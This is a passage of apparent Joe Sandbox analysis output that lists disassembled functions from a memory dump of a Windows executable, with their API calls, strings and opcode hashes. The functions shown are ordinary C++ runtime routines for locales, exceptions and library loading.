Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
String ID:
API String ID: 3956949563-0
Opcode ID: 4a7d56f35f775f8891524f16fd33332f1d9ff76725df848bfdfa590205caaea6
Instruction ID: 21f6ab71bc390e9e79b55621aec28f13bb11feb7d013e01e658ebc81233469c1
Opcode Fuzzy Hash: 4a7d56f35f775f8891524f16fd33332f1d9ff76725df848bfdfa590205caaea6
Instruction Fuzzy Hash: EC2185F2D402199BDF10AF949C06B9E7AF4EF14710F0841A5F51C76281E7B5A944CBA6

Function 00B8CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,00B8D01A,00B71170,00B7AA08,?,?), ref: 00B8CFCC

Strings

api-ms-, xrefs: 00B8CF62
ext-ms-, xrefs: 00B8CF76

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: c444bb7170e3d4b59939a3234289eba96a2ea2ec47294e56b662afb893c336dd
Instruction ID: 202af5130d1cd8e9d1cdb10c580cc2628be883ee19421bd480fb9c813231f91f
Opcode Fuzzy Hash: c444bb7170e3d4b59939a3234289eba96a2ea2ec47294e56b662afb893c336dd
Instruction Fuzzy Hash: FB21EEB1601311ABD731A765DC41A5A7BD5DF52770F1501A1FA55A72A0DB30ED08C7E0

Function 00B80080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B80086
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00B80094
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00B800A5

Strings

GetTempPath2W, xrefs: 00B8009A
GetSystemTimePreciseAsFileTime, xrefs: 00B8008E
kernel32.dll, xrefs: 00B80081

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: a71a4150e3c978c49d6a48e7eeb305120147c550a40e4cc24f6ca5a4497d59f7
Instruction ID: 16209d12b837029e04a9ec7043ee87a2646035d1b728ee183432b97f5a89858f
Opcode Fuzzy Hash: a71a4150e3c978c49d6a48e7eeb305120147c550a40e4cc24f6ca5a4497d59f7
Instruction Fuzzy Hash: A1D09E715492106F83105FB47D4A88A7FE9FA0B7213054192F445D3260FFB145108654

Function 00B94F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ededa642ab6b7968ceaeb1f700a50e95cc942f17c94a0a1e5f713b7764a1adf5
Instruction ID: 21d839b9d657b7f4bc2a4d8b04c7a53c790ea403c065d0c07450d220fded52a3
Opcode Fuzzy Hash: ededa642ab6b7968ceaeb1f700a50e95cc942f17c94a0a1e5f713b7764a1adf5
Instruction Fuzzy Hash: 32B10870A48A499FDF22DFA8C881BADBBF0FF46314F1441E9E50197392DB719941CBA0

Function 00B79B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00B79C97
std::_Throw_Cpp_error.LIBCPMT ref: 00B79CA8
std::_Throw_Cpp_error.LIBCPMT ref: 00B79CBC
std::_Throw_Cpp_error.LIBCPMT ref: 00B79CDD
std::_Throw_Cpp_error.LIBCPMT ref: 00B79CEE
std::_Throw_Cpp_error.LIBCPMT ref: 00B79D06

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID:
API String ID: 2134207285-0
Opcode ID: 775f596849c55fc8acad2ac521ca5f3e68303647ba902356c78f7090303c10e6
Instruction ID: 137a12f0d15d063eb3af18924fca5e78fd92e4d7b576e370a53bd96196833876
Opcode Fuzzy Hash: 775f596849c55fc8acad2ac521ca5f3e68303647ba902356c78f7090303c10e6
Instruction Fuzzy Hash: 0041C3B1900B44CBDF309B648942BAFB7F4EF45320F1886ADD57E262D1D771A944CB52

Function 00B8ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B8ACDE,00B80760,00B7B77F,BB40E64E,?,?,?,?,00B9BFCA,000000FF), ref: 00B8ACF5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B8AD03
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B8AD1C
SetLastError.KERNEL32(00000000,?,00B8ACDE,00B80760,00B7B77F,BB40E64E,?,?,?,?,00B9BFCA,000000FF), ref: 00B8AD6E

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 51a0ca12a8ffedb7c2dafa593e57a449a0a256ea488d3a7f95605efabc10dc1d
Instruction ID: f557a4b014bfcab4231b974cfdcdc0af6482e5aae6b1e97c008323723f502e8f
Opcode Fuzzy Hash: 51a0ca12a8ffedb7c2dafa593e57a449a0a256ea488d3a7f95605efabc10dc1d
Instruction Fuzzy Hash: 3501487221A615AEBB243774BC86D6727D8EB02F7572402BBF630965F1EF514C42D381

Function 00B8B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B8B68D
CallUnexpected.LIBVCRUNTIME ref: 00B8B906

Strings

csm, xrefs: 00B8B618
csm, xrefs: 00B8B5AB
csm, xrefs: 00B8B6C4

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 3392f36908990c35ffb352bf88a4703c734ddcfc9e90d50feb817f294d420568
Instruction ID: 35b3bf55ff407237e86ff5ab80f612aff256e9cd77d2d46729d7d4d3190dce26
Opcode Fuzzy Hash: 3392f36908990c35ffb352bf88a4703c734ddcfc9e90d50feb817f294d420568
Instruction Fuzzy Hash: 7CB11575800209EBCF19EFA4C881DAEBBF9FF54310B14459AE8156B222D731DA61DF92

Function 00B7BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00B7BF44
std::_Ref_count_base::_Decref.LIBCPMT ref: 00B7C028

Strings

RCC, xrefs: 00B7BEAB
MOC, xrefs: 00B7BE9F
csm, xrefs: 00B7BEB7

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: 71dd972314ff77a98847906a0b346fbae5ac13eea9dc588d8211965617efd08d
Instruction ID: b22029087f5ea5cf1f277c27bbc5fcd463d5f29fbfdde962236ea7c6c2f6a513
Opcode Fuzzy Hash: 71dd972314ff77a98847906a0b346fbae5ac13eea9dc588d8211965617efd08d
Instruction Fuzzy Hash: C6416975900205DFCF28EF68C945EAEB7F5EF48300B58C09DE469AB651C734AA45CF52

Function 00B855C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00B9BE94,000000FF,?,00B85685,00B8556C,?,00B85721,00000000), ref: 00B855F9
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00B9BE94,000000FF,?,00B85685,00B8556C,?,00B85721,00000000), ref: 00B8560B
FreeLibrary.KERNEL32(00000000,?,?,00000000,00B9BE94,000000FF,?,00B85685,00B8556C,?,00B85721,00000000), ref: 00B8562D

Strings

mscoree.dll, xrefs: 00B855F2
CorExitProcess, xrefs: 00B85603

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d75dbbd5d3f9ffaa77c31c50975d2c33d2ea4820c936547971bbf20fd91ced74
Instruction ID: 574a41207d44988e3c1119c4ba337604b9d5cb9139bb7966ef8fe9e8837ac22a
Opcode Fuzzy Hash: d75dbbd5d3f9ffaa77c31c50975d2c33d2ea4820c936547971bbf20fd91ced74
Instruction Fuzzy Hash: 1A016271A44619AFDB119F54DC0AFAEB7F8FB05B25F040569F821A32A0EF749900CB90

Function 00B8D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B8D76F
__alloca_probe_16.LIBCMT ref: 00B8D838
__freea.LIBCMT ref: 00B8D89F

Part of subcall function 00B8BF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,00B7A67D,00000018,?,00B73D4A,00000018,00000000), ref: 00B8BF43

__freea.LIBCMT ref: 00B8D8B2
__freea.LIBCMT ref: 00B8D8BF

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 81a1344120fb40f97d95457694709dd8876c0a3f3229348354f571684fed7e82
Instruction ID: c6ee30c39dceb20fe928e5d547768dc5389ba79f9a5086867d5ab992bc372da9
Opcode Fuzzy Hash: 81a1344120fb40f97d95457694709dd8876c0a3f3229348354f571684fed7e82
Instruction Fuzzy Hash: F2518172600206AFEB217F658C81EBB7BE9EF44750F1506AAFD14D62A1EB70DC50D7A0

Function 00B7EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32(?,00B7EFCE,00B78E30,00000000,?,00B78E30,00B7A2F0), ref: 00B7F005
AcquireSRWLockExclusive.KERNEL32(00B78E38), ref: 00B7F024
AcquireSRWLockExclusive.KERNEL32(00B78E38,00B7A2F0,?), ref: 00B7F052
TryAcquireSRWLockExclusive.KERNEL32(00B78E38,00B7A2F0,?), ref: 00B7F0AD
TryAcquireSRWLockExclusive.KERNEL32(00B78E38,00B7A2F0,?), ref: 00B7F0C4

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: 3ab3cbcd111d529e32b4c0eec0b341db4dca4f01871fb97f097876861d51b3a8
Instruction ID: 295af59d2bfe57c9ff7e79965f31030b681c8232185d2668fa683284b9699d38
Opcode Fuzzy Hash: 3ab3cbcd111d529e32b4c0eec0b341db4dca4f01871fb97f097876861d51b3a8
Instruction Fuzzy Hash: BB414A7150060BDFCB20DF65C4819BAB3F5FF05311B5089BAE46A97A42DB30E985CB59

Function 00B73C70 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B73CA5
std::_Lockit::_Lockit.LIBCPMT ref: 00B73CBF
std::_Lockit::~_Lockit.LIBCPMT ref: 00B73CE0
__Getctype.LIBCPMT ref: 00B73D92
std::_Lockit::~_Lockit.LIBCPMT ref: 00B73DD8

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
String ID:
API String ID: 3087743877-0
Opcode ID: 19e4d48596338040385d34978f0967778b60a7848c6f30604da8e39bc2b21e60
Instruction ID: cebebba7e3c8059af8b6b7092b8fa71904bca982821e600bcea9870c4c0dceef
Opcode Fuzzy Hash: 19e4d48596338040385d34978f0967778b60a7848c6f30604da8e39bc2b21e60
Instruction Fuzzy Hash: 07411871D002188FCB24DF94D845BAEBBF1FF85B20F1481A9D8296B391DB34AE41CB91

Function 00B7D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B7D4C9
std::_Lockit::_Lockit.LIBCPMT ref: 00B7D4D3
int.LIBCPMT ref: 00B7D4EA

Part of subcall function 00B7C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00B7C1F6
Part of subcall function 00B7C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00B7C210

codecvt.LIBCPMT ref: 00B7D50D
std::_Lockit::~_Lockit.LIBCPMT ref: 00B7D544

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID:
API String ID: 3716348337-0
Opcode ID: cc113993799878b2a6256f949ab519f09325372f00670f3769b4818aa566b50b
Instruction ID: ce9a29609bf155946717f6d6d195583249f562d890a1cd2ec84ecdc946ce110b
Opcode Fuzzy Hash: cc113993799878b2a6256f949ab519f09325372f00670f3769b4818aa566b50b
Instruction Fuzzy Hash: B101C0319001158FCB05EBA4C812ABE7BF5AF84324F258599E43DAB282CF349E00CB92

Function 00B7ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B7ADDE
std::_Lockit::_Lockit.LIBCPMT ref: 00B7ADE9
std::_Lockit::~_Lockit.LIBCPMT ref: 00B7AE57

Part of subcall function 00B7ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00B7ACC2

std::locale::_Setgloballocale.LIBCPMT ref: 00B7AE04
_Yarn.LIBCPMT ref: 00B7AE1A

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 7ab513ff8c7e25070f40b9be3ba449141316658c1f9ff842aa707af97a27f72f
Instruction ID: 8170329d3533863cc5a2e2a47ed6a977cac1f17d7c7da5b8a96c8d516f5b96a0
Opcode Fuzzy Hash: 7ab513ff8c7e25070f40b9be3ba449141316658c1f9ff842aa707af97a27f72f
Instruction Fuzzy Hash: 8F0184756006119BCB46FB20D85697D7BF5FFC9750B188099E82A57381CF345E42CB86

Function 00B71750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00B71783

Strings

ios_base::badbit set, xrefs: 00B71BFA, 00B71C20
ios_base::eofbit set, xrefs: 00B71BEA
ios_base::failbit set, xrefs: 00B71BEF

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: _strlen
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4218353326-1866435925
Opcode ID: 81166c4b1a2b9f8c1e37b84275bb918bbb267eddb5d7a7a5d09d3b30718f1fdc
Instruction ID: abd2577412d62608b4c263d589e4067eb511b08a6b12e98aaa5be7ff7c9368d3
Opcode Fuzzy Hash: 81166c4b1a2b9f8c1e37b84275bb918bbb267eddb5d7a7a5d09d3b30718f1fdc
Instruction Fuzzy Hash: 8DF14F75A006148FCB14CF6CC494BADB7F1FF89324F1986A9E829AB391D734AD45CB90

Function 00B7B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00B7B809

Strings

csm, xrefs: 00B7B7A1
RCC, xrefs: 00B7B795
MOC, xrefs: 00B7B789

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: 78c669ec4b5ae15d34ce2a8a2e3c5af6db28b4e87776b61ed55d7e75a0a3d33d
Instruction ID: 36f33521be732a8f019db167d8cf72e758d880f076f927a398a6738f5f038604
Opcode Fuzzy Hash: 78c669ec4b5ae15d34ce2a8a2e3c5af6db28b4e87776b61ed55d7e75a0a3d33d
Instruction Fuzzy Hash: B821A1359016059FCF289FA4C455FA9B7ECEF40720F14C59EF42987690DB34AE40CE81

Function 00B96940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B969DC,00000000,?,00BAD2B0,?,?,?,00B96913,00000004,InitializeCriticalSectionEx,00BA0D34,00BA0D3C), ref: 00B9694D
GetLastError.KERNEL32(?,00B969DC,00000000,?,00BAD2B0,?,?,?,00B96913,00000004,InitializeCriticalSectionEx,00BA0D34,00BA0D3C,00000000,?,00B8BBBC), ref: 00B96957
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B9697F

Strings

api-ms-, xrefs: 00B96964

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
